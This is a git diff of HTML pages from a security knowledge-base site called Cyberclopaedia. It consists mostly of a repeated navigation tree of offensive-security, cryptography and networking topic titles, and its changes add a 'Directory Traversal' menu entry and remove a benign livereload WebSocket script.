      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -292,22 +292,6 @@

Implement - - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html b/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html index 1dd16b86..4119dbd3 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Pad.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -204,22 +204,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html index 211c22e2..449290a4 100644 --- a/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html +++ b/docs/Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
